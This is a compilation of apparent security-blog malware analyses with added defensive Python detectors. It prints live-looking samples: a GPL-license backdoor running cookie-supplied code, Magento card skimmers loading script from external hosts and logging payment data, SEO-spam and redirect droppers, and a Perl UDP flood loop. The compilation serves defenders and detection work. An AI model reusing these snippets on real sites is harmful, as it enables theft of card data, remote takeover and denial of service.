Straightforward Backdoor Installer

Malware uses encryption, obfuscation and other tricks to avoid detection so that compromised sites stay infected for as long as possible. Quite often it is not easy to spot malicious code even when you are looking at it, especially if you are not a professional programmer or security analyst.

But sometimes the malware is very straightforward. For example, we found this backdoor installer in a file called robots.php in one WordPress theme. It does not use any encryption, its code is properly indented, and its variable names and comments are clear and descriptive. You should not think twice when you see code like this:

class Searcher
{
    private $backdoor;
...
    private $backdoorName = 'gpl_license.php';
...
    public function __construct($backdoor)
    {
        $this->backdoor = $backdoor;
    }
...
    $this->chooseDirsForBackdoor();
    while ($this->hasUnconfirmedBackdoors()) {
        $this->addBackdoors();
        $this->checkBackdoors();
    };
...

However, this file is only used in the early stage of an infection, when the attackers have just gained access to a vulnerable website and managed to upload it to the server. They then use this backdoor installer to create multiple backdoors (gpl_license.php in this case) in various directories. That gpl_license.php backdoor is much more obscure, and you might even mistake it for a real license file: if you quickly scroll through it, you will only see the text of the GNU GPL license.

<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007
...

Only if you inspect the file carefully will you notice that it is actually a PHP file and that the license text sits inside a multiline comment. Inside the license text there are two short comment breaks containing PHP code, which together execute arbitrary code passed in HTTP cookies:

...
giving you */extract($_COOKIE);/* copy, distribute and/or modify it.
...
which are not */@$F&&@$F($A,$B);/*.  For example, Corresponding Source
...

These two backdoors, which use completely different approaches to obfuscation, are part of the same attack. This shows that there is no such thing as a typical backdoor, and no single pattern that webmasters should search for when we say they should find and remove all backdoors. Backdoors are the most versatile type of website malware: we have more than a thousand samples of different backdoors and still find new variations every day. Probably the most efficient way to detect backdoors is file integrity monitoring, which reports every added or modified file regardless of what code was added. If you do not use such monitoring and want to make sure you have not missed any backdoors on your server, you can have us scan your site for thousands of different malware patterns.
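
The license-in-a-comment trick above can be caught mechanically: split the file on its `/* ... */` pairs and look at whatever PHP is left outside the comments. The following scanner is an added example written for this post, not code from the sample or from Sucuri; the two license files it scans are constructed to mirror the gpl_license.php layout described above, and the indicator list is a heuristic of our own choosing.

```python
import re

# Constructed sample modelled on the gpl_license.php backdoor described above:
# a license text inside one block comment, with two short comment breaks.
LICENSE_BACKDOOR = """<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007
  Everyone is permitted to copy and distribute verbatim copies
giving you */extract($_COOKIE);/* copy, distribute and/or modify it.
  To protect your rights, we need to prevent others from denying you
which are not */@$F&&@$F($A,$B);/*.  For example, Corresponding Source
*/
"""

# Constructed clean file: the same layout, but the comment is never broken.
LICENSE_CLEAN = """<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007
  Everyone is permitted to copy and distribute verbatim copies
*/
"""

# Indicators worth flagging in any code that sits between comment breaks.
SUSPICIOUS = [
    (re.compile(r'extract\s*\(\s*\$_(COOKIE|GET|POST|REQUEST|SERVER)'),
     'extract() on request superglobal'),
    (re.compile(r'\$\w+\s*\('), 'variable function call'),
    (re.compile(r'\b(eval|assert|create_function|system|passthru|shell_exec|base64_decode)\s*\('),
     'dangerous function call'),
]


def split_comments(src):
    """Split PHP source into ('code', text) and ('comment', text) segments by
    tracking /* ... */ pairs. Heuristic only: it ignores string literals and
    // comments, which is enough for the license-inside-a-comment trick."""
    segments, pos, in_comment = [], 0, False
    while pos < len(src):
        if in_comment:
            end = src.find('*/', pos + 2)          # skip the opening "/*" itself
            stop = len(src) if end == -1 else end + 2
            segments.append(('comment', src[pos:stop]))
            in_comment = False
        else:
            start = src.find('/*', pos)
            stop = len(src) if start == -1 else start
            segments.append(('code', src[pos:stop]))
            in_comment = True
        pos = stop
    return segments


def hidden_code(src):
    """Return the non-empty code fragments found outside the comment(s),
    ignoring the PHP open/close tags."""
    out = []
    for kind, text in split_comments(src):
        if kind != 'code':
            continue
        text = re.sub(r'<\?php|\?>', '', text).strip()
        if text:
            out.append(text)
    return out


def scan(src):
    """Return [(fragment, [reasons])] for every fragment that hits an indicator."""
    hits = []
    for frag in hidden_code(src):
        reasons = [why for rx, why in SUSPICIOUS if rx.search(frag)]
        if reasons:
            hits.append((frag, reasons))
    return hits


if __name__ == '__main__':
    for name, src in (('backdoor', LICENSE_BACKDOOR), ('clean', LICENSE_CLEAN)):
        print(name, scan(src))
```

A real license file yields no code fragments at all, so an even simpler rule works as a first pass: a `.php` file whose only non-comment content is the open tag is fine; one that has any code between two comment breaks deserves a look.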

Another Magento CC stealer

Lately we have been analysing multiple credit card stealers for Magento. We are seeing an increasing trend there, as attackers can monetize a compromised e-commerce site much more easily than one without credit card data.

This new variation of the CC stealer is not injected directly into the website but loaded from an external source. Loading the code from another source lets the attacker modify the malware's source code at will without needing to "reinfect" the site.

Here is a snippet of the code that we found inside Magento's /js/lib/ccard.js:

...<!-- Google Code for Remarketing Tag -->if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)){document.write('<script src="hxxps://jquery -cdn .top/mage .js"></script>')};<!-- Google Code for Remarketing Tag -->

Basically, this JavaScript acts as a man-in-the-middle between the user and the checkout page: whenever credit card information is submitted, it lets the CMS process the order normally but at the same time forwards the data to a malicious domain at hxxps://jquery-cdn . top/ mag.php.

We also found a slightly different version of the malicious code inside /js/scriptaculous/effects.js:

if((new RegExp('onepage|checkout|onestep|fircheckout')).test(window.location)) {document.write('>tpircs/<>"sj.egam/ue.todstats//:spxxh"=crs tpircs<'.split("").reverse().join(""))}

Putting the code in a readable format we get:

if ((new RegExp('onepage|checkout|onestep|fircheckout')).test(window.location)) {
    document.write('<script src="hxxps:// statsdot. eu/mage.js"></script>');
}

In this case the script uses the domain hxxps:// statsdot. eu to load the JavaScript, and it sends the credit card data over to hxxps://statsdot .eu /mag.php.

An interesting point about these domains is that the attackers send the stolen information over an encrypted channel (HTTPS). And even though the credit card information is not processed directly at your shop, it is very important to ensure that your website is up to date and has the latest patches installed.

Moreover, in order to detect, mitigate and prevent such issues, we also recommend having a Web Application Firewall (WAF) in place, keeping regular backups, and using a File Integrity Monitoring tool to ensure the integrity of your file system.
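
Both injections above share a shape that can be searched for in a Magento tree: a `RegExp(...).test(window.location)` gate on checkout-like URLs, followed by a `document.write` of an external `<script src=...>`, in one case hidden behind `.split("").reverse().join("")`. The detector below is an added example written for this post, not code from the samples or from Sucuri; its two input strings are constructed copies of the snippets above with the defanging spaces removed, and the checkout keyword list and regexes are assumptions of ours.

```python
import re

# Constructed samples modelled on the two injections shown above. The domains
# are kept in the page's defanged "hxxps" form (with the spaces removed).
PLAIN = ('<!-- Google Code for Remarketing Tag -->'
         "if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))"
         "{document.write('<script src=\"hxxps://jquery-cdn.top/mage.js\"></script>')};")
REVERSED = ("if((new RegExp('onepage|checkout|onestep|fircheckout')).test(window.location)) "
            "{document.write('>tpircs/<>\"sj.egam/ue.todstats//:spxxh\"=crs tpircs<'"
            '.split("").reverse().join(""))}')
CLEAN = 'if (document.readyState === "complete") { initCheckoutForm(); }'

# A quoted literal immediately followed by .split("").reverse().join("").
REVERSED_LITERAL = re.compile(
    r"""(['"])((?:(?!\1).)*)\1\s*\.split\(["']{2}\)\s*\.reverse\(\)\s*\.join\(["']{2}\)""")
# <script ... src="..."> tags (case-insensitive).
SCRIPT_SRC = re.compile(r"""<script[^>]*\ssrc=["']([^"']+)["']""", re.I)
# new RegExp('...').test(window.location): the URL gate used by both samples.
GATE = re.compile(r"""RegExp\(\s*(['"])((?:(?!\1).)*)\1\s*\)\s*\)?\s*\.test\(\s*window\.location""")
HOST = re.compile(r"""^(?:hxxps?|https?)://([^/"'\s]+)""", re.I)
CHECKOUT_WORDS = ('checkout', 'onepage', 'onestep', 'payment')


def deobfuscate(js):
    """Append the un-reversed form of every reversed string literal to the text,
    so that the normal <script src=...> search sees what the browser would."""
    extra = [m.group(2)[::-1] for m in REVERSED_LITERAL.finditer(js)]
    return js + '\n' + '\n'.join(extra)


def injected_loaders(js):
    """Describe checkout-gated external script loaders in a JS file.
    'gate' is the URL pattern tested against window.location (or None) and
    'hosts' are the hosts of the <script src=...> tags written into the page."""
    text = deobfuscate(js)
    gate = GATE.search(text)
    hosts = []
    for m in SCRIPT_SRC.finditer(text):
        h = HOST.match(m.group(1))
        if h and h.group(1).lower() not in hosts:
            hosts.append(h.group(1).lower())
    return {'gate': gate.group(2) if gate else None, 'hosts': hosts}


def is_skimmer_loader(js):
    """True when an external script is pulled in only on checkout-like pages,
    or when the loader tag is hidden behind string reversal."""
    info = injected_loaders(js)
    if not info['hosts']:
        return False
    gated = info['gate'] is not None and any(w in info['gate'].lower() for w in CHECKOUT_WORDS)
    return bool(gated or REVERSED_LITERAL.search(js))


if __name__ == '__main__':
    for name, js in (('ccard.js', PLAIN), ('effects.js', REVERSED), ('clean', CLEAN)):
        print(name, is_skimmer_loader(js), injected_loaders(js))
```

Run it over every `.js` file under the Magento docroot and compare the reported hosts against the CDNs you actually use; a loader that only fires on `checkout` URLs and points anywhere you do not recognise is the finding, whether or not the literal was reversed.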

SEO Poisoning on nulled templates

We at Sucuri always stress the risks of using themes, plugins or any add-on downloaded from unofficial sources ("nulled" versions). During one investigation we found, inside a theme, malicious code being used to promote an external website and possibly generate revenue for the "developer" without the user's consent. Inside the downloaded package there were lots of files named index.php and default.php throughout different folders. Those files contained the following base64-encoded code:

<?php $wfk='PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOjA7bGVmdDotOTk5OXB4OyI+CjxhIGhyZWY9Imh0dHA6Ly9qb29tbGE0ZXZlci5ydS9ib3d0aGVtZXMvMjI4Ny1idC1waG90b2dyYXBoeS5odG1sIiB0aXRsZT0iQlQgUGhvdG9ncmFwaHkgLSDRiNCw0LHQu9C+0L0gam9vbWxhIiB0YXJnZXQ9Il9ibGFuayI+QlQgUGhvdG9ncmFwaHkgLSDRiNCw0LHQu9C+0L0gam9vbWxhPC9hPgo8YSBocmVmPSJodHRwOi8vYWxsLWJvb2submV0LyIgdGl0bGU9ItCa0L3QuNCz0LgiIHRhcmdldD0iX2JsYW5rIj7QmtC90LjQs9C4PC9hPgo8L2Rpdj4='; echo base64_decode($wfk); ?>

Decoding it into a human-readable format, we got these “invisible” malicious links:

<div style="position:absolute;top:0;left:-9999px;"><a href="hxxp://joomla4ever .ru/bowthemes/2287-bt-photography.html" title="BT Photography - шаблон joomla" target="_blank">BT Photography - шаблон joomla</a><a href="hxxp://all-book .net/" title="Книги" target="_blank">Книги</a></div>

This kind of infection is commonly injected into nulled components for different CMSs. The arbitrary links damage the SEO positioning of the infected website while promoting a particular site, with the intent of generating revenue for the "developers".

To reduce the risk, we always recommend downloading any add-on (themes, plugins, extensions) for your site directly from the official source, because you never know which extra "feature" you are getting with those "alternative" versions.

You may find more information related to this infection here, here and here.
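
When auditing a downloaded package, the two things to check are whether a file decodes a base64 blob with `base64_decode()` and whether the decoded HTML is pushed off-screen before its links are rendered. The checker below is an added example written for this post, not code from the theme or from Sucuri; the PHP files it inspects are constructed here (the payload is base64-encoded at runtime so the sample is self-contained), and the list of CSS properties treated as "hidden" is our own assumption.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed samples in the shape of the index.php/default.php droppers above.
# Placeholder domains are used instead of the ones seen in the wild.
HIDDEN_HTML = ('<div style="position:absolute;top:0;left:-9999px;">'
               '<a href="hxxp://example-spam.invalid/themes/123.html" title="Free themes" '
               'target="_blank">Free themes</a>'
               '<a href="hxxp://books.example.invalid/" title="Books" target="_blank">Books</a></div>')
VISIBLE_HTML = '<p>Welcome to our store. Enjoy your visit!</p>'
SPAM_PHP = "<?php $wfk='%s'; echo base64_decode($wfk); ?>" % base64.b64encode(HIDDEN_HTML.encode()).decode()
CLEAN_PHP = "<?php echo base64_decode('%s'); ?>" % base64.b64encode(VISIBLE_HTML.encode()).decode()

# Any quoted base64-looking literal of 40+ characters (the payload is usually
# parked in a variable, so we do not require it to sit inside the call itself).
B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/]{40,}={0,2})\1""")
# Inline CSS that takes an element out of the visible page.
OFFSCREEN = re.compile(r'(left|top|right|bottom)\s*:\s*-\d{3,}px|display\s*:\s*none|'
                       r'visibility\s*:\s*hidden|font-size\s*:\s*0', re.I)


class _HiddenLinks(HTMLParser):
    """Collect hrefs of <a> tags nested inside an element whose style hides it.
    Void tags without a closing tag would skew the stack; good enough for a scan."""
    def __init__(self):
        super().__init__()
        self.depth = 0      # number of hidden ancestors currently open
        self.stack = []     # per open tag: was it hidden?
        self.links = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = bool(OFFSCREEN.search(a.get('style') or ''))
        self.stack.append(hidden)
        if hidden:
            self.depth += 1
        if tag == 'a' and self.depth and a.get('href'):
            self.links.append(a['href'])

    def handle_endtag(self, tag):
        if self.stack and self.stack.pop():
            self.depth -= 1


def decoded_payloads(php_src):
    """Decode every long base64 literal in a PHP file that calls base64_decode()."""
    if 'base64_decode' not in php_src:
        return []
    out = []
    for m in B64_LITERAL.finditer(php_src):
        try:
            out.append(base64.b64decode(m.group(2), validate=True).decode('utf-8', 'replace'))
        except ValueError:          # binascii.Error is a ValueError: not real base64
            continue
    return out


def hidden_links(php_src):
    """Return hrefs of links that a decoded payload would render off-screen."""
    found = []
    for html in decoded_payloads(php_src):
        p = _HiddenLinks()
        p.feed(html)
        found.extend(p.links)
    return found


if __name__ == '__main__':
    print('spam  :', hidden_links(SPAM_PHP))
    print('clean :', hidden_links(CLEAN_PHP))
```

Decoding alone is not the signal (the clean sample decodes to an ordinary paragraph and is not flagged); the combination of an encoded blob, `echo`, and an off-screen container around outbound links is what marks the SEO-poisoning dropper.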

MiniCMS as a Spam Site Generator

SEO spam is very common for a reason -- money. Spammers are paid to promote websites on Google, and we deal with lots of SEO spam cases daily. The most common cases are database infections, theme file infections and random spammy HTML pages. However, a few days ago we found an interesting variation: a whole CMS specially configured and used to serve spam from a website.

The client asked us to help resolve spam issues in Google search results for their website. It was clear that the doorways were still online when we began the analysis, so we quickly pinpointed the source of the spam: the hackers had created a directory where they installed a copy of the MiniCMS application and populated it with spammy content.

MiniCMS is a legitimate minimalist content management system that does not use a database. To store posts and settings it uses ordinary files (.dat files for posts), which makes it very easy to install on virtually any server that supports PHP. In this case, there were lots of spam .dat files.

This case shows that some site owners do not realize they are providing a domain and free hosting to spammers until they get blacklisted or penalized by Google. This is why it is important to monitor your website for all sorts of anomalies: keep an eye on Google search results for your site and on Search Console reports that may mention suspicious URLs or keywords on your site. You might even want to set up Google Alerts for common spammy keywords combined with your site. Regular internal and external security scans (for example, those provided by our Website Monitoring Service) can help detect the problem even faster.

Blacklist Monitoring for Hackers and Webmasters

An infected site is only useful to cyber-criminals until it gets blacklisted. Traffic drops significantly when a URL is on Google's Safe Browsing list, and if the hacked site is used to send email spam, the success of the spam campaign directly correlates with the server's absence from anti-spam blacklists. That is why it is important for hackers to know whether the sites they compromised are blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.


if ($_GET['mod']){
  if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){
    $g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
      $g_sch = str_replace('"listed"', '', $g_sch, $g_out);
      if($g_out){
        header('HTTP/1.1 202');
        exit;
      }
  }

  if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){
    $sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
    if ($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or 
        $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or 
        $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
      header('HTTP/1.1 203');
      exit;
    }
  }

  header('HTTP/1.1 201');
  exit;
}

header('HTTP/1.1 302 Found');
header('Location: hxxp://rx-webmart[.]su');

As you can see, by default it is just web spam malware that redirects visitors to a site selling counterfeit drugs. But if you pass certain parameters to this script, it checks whether the site is blacklisted by Google and/or by Spamhaus (which suggests that the same campaign also involves email spam). The result is returned as an HTTP status code:

  • 201 - not blacklisted
  • 202 - blacklisted by Google
  • 203 - blacklisted by Spamhaus.org

The use of HTTP codes instead of human-readable results makes us think that this functionality is used by a C&C server that regularly polls blacklisting information from all compromised sites.

While this sort of monitoring may be useful to hackers, it is even more useful to legitimate site owners, who risk their business and reputation if their sites get blacklisted. For them it is important to be able to investigate and resolve such incidents as soon as possible. That is why Sucuri Website Antivirus includes monitoring of 10 blacklists (Google Safe Browsing, SpamHaus DBL, Norton Safe Web, PhishTank, Opera, SiteAdvisor, Bitdefender, Yandex, ESET, plus our own Sucuri blacklist). If websites get blacklisted for any reason, we not only inform the site owners about it but also help clean their sites and remove them from the blacklists.
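
The Spamhaus DBL lookup in the malware above is the same DNS query a webmaster can run against their own domain: resolve `<domain>.dbl.spamhaus.org` and interpret the returned 127.0.1.x address. The following checker is an added example written for this post, not code from the sample or from Sucuri. The return-code meanings come from Spamhaus's published DBL documentation; the resolver is injectable so the classification logic can be exercised with a constructed lookup table, and `fake_resolver` below is exactly that constructed table, not real DBL data.

```python
import socket

# Return codes documented by Spamhaus for the DBL zone (dbl.spamhaus.org).
# The malware above matches exactly this set of addresses.
DBL_CODES = {
    '127.0.1.2': 'spam domain',
    '127.0.1.4': 'phish domain',
    '127.0.1.5': 'malware domain',
    '127.0.1.6': 'botnet C&C domain',
    '127.0.1.102': 'abused legit spam',
    '127.0.1.103': 'abused spammed redirector domain',
    '127.0.1.104': 'abused legit phish',
    '127.0.1.105': 'abused legit malware',
    '127.0.1.106': 'abused legit botnet C&C',
}
ZONE = '.dbl.spamhaus.org'


def check_dbl(domain, resolve=socket.gethostbyname):
    """Look up <domain>.dbl.spamhaus.org and classify the answer.

    Returns {'listed': True|False|None, 'code': str|None, 'reason': str}.
    `resolve` defaults to a real DNS lookup; pass another callable to test offline.
    Unlike PHP's gethostbyname(), which hands back the name unchanged when there is
    no record, Python raises an OSError (socket.gaierror) on NXDOMAIN, and that is
    the normal "not listed" answer."""
    name = domain.strip().rstrip('.').lower() + ZONE
    try:
        code = resolve(name)
    except OSError:
        return {'listed': False, 'code': None, 'reason': 'not listed'}
    if code in DBL_CODES:
        return {'listed': True, 'code': code, 'reason': DBL_CODES[code]}
    if code == '127.0.1.255' or code.startswith('127.255.255.'):
        # Spamhaus signals query problems (IP address queried, typo in the zone,
        # query via a public resolver, volume exceeded) with these ranges.
        return {'listed': None, 'code': code, 'reason': 'query error (not a listing)'}
    return {'listed': None, 'code': code, 'reason': 'unexpected response'}


def fake_resolver(name):
    """Constructed lookup table standing in for DNS, for offline use only."""
    table = {
        'bad.example' + ZONE: '127.0.1.2',
        'abused.example' + ZONE: '127.0.1.102',
        'err.example' + ZONE: '127.255.255.254',
    }
    if name in table:
        return table[name]
    raise OSError(-2, 'Name or service not known')   # same as NXDOMAIN from gaierror


if __name__ == '__main__':
    for d in ('bad.example', 'Abused.Example.', 'err.example', 'clean.example'):
        print(d, check_dbl(d, fake_resolver))
```

Two practical points: a 127.255.255.x answer means your query was refused (typically because it went through a public resolver), so treat it as "unknown" rather than "clean", and a blocklist should be polled from your own monitoring, not left for the attackers' C&C to be the first to know.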

Another sample of a Magento compromise for profit

We often see malicious code being used to steal credit card details and sensitive information from compromised Magento sites, but this one caught our eye because it differed from the others in how the information was collected and stored.

Usually the attacker sends all the sensitive information via e-mail, but in this case a text file with a "jpg" extension is created to store all the data:

if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);
}

Basically, this code writes every request whose URL contains one of the words "admin|payment|order|saveOrder|onepage|checkout" to a file located at "/media/catalog/product/2/1/21_1.jpg".

As you can imagine, at this point the customers' credit card details and the admin logins are available for download.

The data is serialized and base64-encoded inside the file "21_1.jpg", but after reversing these steps you will see something like this:

[payment] => Array
        (
            [method] => vm
            [cc_type] => VI
            [cc_number] => XXXXX -> indistinct cc number
            [c_exp_month] => 9
            [cc_exp_year] => 2017
            [cc_cid] => 048
        )

Among other data you will see admin passwords, customer data and credit card details. It is quite scary to realize that all this information is being stolen, and that attackers continually change their methods to stay undetected.

This particular code is usually added inside the files "./app/code/core/Mage/Core/functions.php" or "./lib/Varien/Autoload.php", but other files may be affected. We recommend constantly checking the core files for any change and keeping all software updated. Also, for obvious reasons, it is incredibly important to change the passwords of all admin users to avoid re-infection.
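
"Checking the core files for any change" is file integrity monitoring, the same control recommended for the backdoor installer earlier on this page: hash every file under the docroot once, store the digests, and diff a fresh hash run against that baseline. The tool below is an added example written for this post, not code from Sucuri or from Magento. Its `demo()` builds a throwaway directory with placeholder contents at the paths named above (the core file and the fake `21_1.jpg`) and then simulates the two changes this stealer makes; the paths come from the post, the file contents are constructed.

```python
import hashlib
import json
import os
import shutil
import tempfile


def hash_tree(root, exts=None):
    """Map every file under root (relative path, '/' separated) to its SHA-256.
    `exts` can restrict the scan to certain extensions, but note that a filter
    like ('.php', '.js') would never see a data drop saved as a .jpg."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if exts and not name.endswith(tuple(exts)):
                continue
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, 'rb') as f:
                for chunk in iter(lambda: f.read(65536), b''):
                    h.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            digests[rel] = h.hexdigest()
    return digests


def save_baseline(root, path):
    with open(path, 'w') as f:
        json.dump(hash_tree(root), f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Added, modified and removed paths between two hash maps."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return {'added': added, 'modified': modified, 'removed': removed}


def _write(root, rel, body):
    full = os.path.join(root, *rel.split('/'))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, 'wb') as f:
        f.write(body)


def demo():
    """Constructed scenario: take a baseline, then apply the changes described above."""
    root = tempfile.mkdtemp()
    try:
        # Placeholder contents at the paths named in the post (not real Magento code).
        _write(root, 'app/code/core/Mage/Core/functions.php', b"<?php // core helper functions\n")
        _write(root, 'lib/Varien/Autoload.php', b"<?php // autoloader\n")
        _write(root, 'media/catalog/product/1/1/11_1.jpg', b"\xff\xd8\xff\xe0 placeholder jpeg bytes")
        baseline = hash_tree(root)

        # Simulated infection: code appended to a core file, plus a text "image".
        with open(os.path.join(root, 'app', 'code', 'core', 'Mage', 'Core', 'functions.php'), 'ab') as f:
            f.write(b"// appended by attacker (placeholder)\n")
        _write(root, 'media/catalog/product/2/1/21_1.jpg', b"YToxOntz...constructed base64 line\n")

        return compare(baseline, hash_tree(root))
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    print(demo())
```

Schedule `hash_tree` against a baseline saved right after a clean install or update, and review every `added` and `modified` path: the two hits the demo reports are exactly the core-file injection and the `.jpg` drop this post describes, and a scan restricted to `.php` files would have missed the second one.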

Finally, if you need professional help, you can always count on us.

Infected websites being used to distributed denial of...

After a website is compromised it can be misused in multiple ways. We often see compromised sites used in SEO spam campaigns or to distribute drive-by downloads. However, last week we found an interesting DDoS (Distributed Denial of Service) tool on one of our clients' websites that I would like to share.

The code was added to /var/tmp and was called by an external PHP script, allowing a remote attacker to start a DDoS against specific targets. This is a snippet of the malicious code:

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpakets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &"); 
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

The malware takes an $ip, $port and $time as arguments to launch the attack:

$ARGC=@ARGV;
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[0];
$time=$ARGV[0];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

Once the information is supplied, the script sends as many UDP packets as possible, trying to flood the victim's network. The side effect is that the compromised server can itself become overloaded by the resource (CPU/memory) consumption and exceed its bandwidth limits.

If your site is currently experiencing high server resource usage or unexpected behaviour, it could be an indication of a compromise, so it is equally important to be on the lookout for such issues.
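
A web server that has been turned into a UDP flooder shows up in its kernel counters long before anyone notices the CPU load: the `Udp:` lines of `/proc/net/snmp` count every datagram sent, and a site that serves web pages has no reason to send UDP in bulk. The monitor below is an added example written for this post, not code from Sucuri; the two snapshots it compares are constructed to look like `/proc/net/snmp` output taken ten seconds apart, and the alert thresholds are our own assumptions.

```python
# Constructed /proc/net/snmp excerpts (not real captures). The kernel prints a
# header line and a values line per protocol; only the Udp: pair is used here.
SNAPSHOT_T0 = """\
Ip: Forwarding DefaultTTL InReceives InHdrErrors
Ip: 2 64 1003521 0
Udp: InDatagrams NoPorts InErrors OutDatagrams RcvbufErrors SndbufErrors InCsumErrors IgnoredMulti
Udp: 48213 12 0 47990 0 0 0 0
"""
# Ten seconds later, while the flooder is running: out jumps by 2.5 million.
SNAPSHOT_T1 = """\
Ip: Forwarding DefaultTTL InReceives InHdrErrors
Ip: 2 64 1003884 0
Udp: InDatagrams NoPorts InErrors OutDatagrams RcvbufErrors SndbufErrors InCsumErrors IgnoredMulti
Udp: 48240 12 0 2547990 0 0 0 0
"""
# Ten seconds later on a quiet server: a little DNS traffic and nothing else.
SNAPSHOT_QUIET = """\
Ip: Forwarding DefaultTTL InReceives InHdrErrors
Ip: 2 64 1003600 0
Udp: InDatagrams NoPorts InErrors OutDatagrams RcvbufErrors SndbufErrors InCsumErrors IgnoredMulti
Udp: 48320 12 0 48100 0 0 0 0
"""


def parse_snmp(text, proto='Udp'):
    """Turn the header/values line pair for `proto` into a dict of counters."""
    lines = [l for l in text.splitlines() if l.startswith(proto + ':')]
    if len(lines) < 2:
        raise ValueError('no %s counters found' % proto)
    keys = lines[0].split()[1:]
    vals = [int(v) for v in lines[1].split()[1:]]
    return dict(zip(keys, vals))


def udp_out_rate(before, after, seconds):
    """Outbound UDP datagrams per second between two snapshots."""
    delta = parse_snmp(after)['OutDatagrams'] - parse_snmp(before)['OutDatagrams']
    if delta < 0 or seconds <= 0:
        raise ValueError('counters wrapped or reset, or bad interval')
    return delta / seconds


def flood_suspected(before, after, seconds, threshold_pps=10000, ratio=10):
    """Alert when outbound UDP is both fast and one-sided: legitimate UDP use
    (DNS, NTP) is request/response, so out >> in with a high rate is the tell."""
    b, a = parse_snmp(before), parse_snmp(after)
    out = a['OutDatagrams'] - b['OutDatagrams']
    inb = a['InDatagrams'] - b['InDatagrams']
    return out / seconds >= threshold_pps and out > ratio * max(inb, 1)


if __name__ == '__main__':
    import time
    # Live use on Linux: sample the real file twice and compare.
    with open('/proc/net/snmp') as f:
        first = f.read()
    time.sleep(10)
    with open('/proc/net/snmp') as f:
        second = f.read()
    print('UDP out pps:', udp_out_rate(first, second, 10), 'flood:', flood_suspected(first, second, 10))
```

When the alert fires, the next step is `ss -u -a -p` (or `lsof -i udp`) to find the process holding the socket; a Perl interpreter started from `/var/tmp` with a raw UDP socket, as in this case, is the thing to kill and then trace back to the web request that launched it.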

You can always count on CloudProxy, our website firewall, to help you protect your site against this and many other attacks.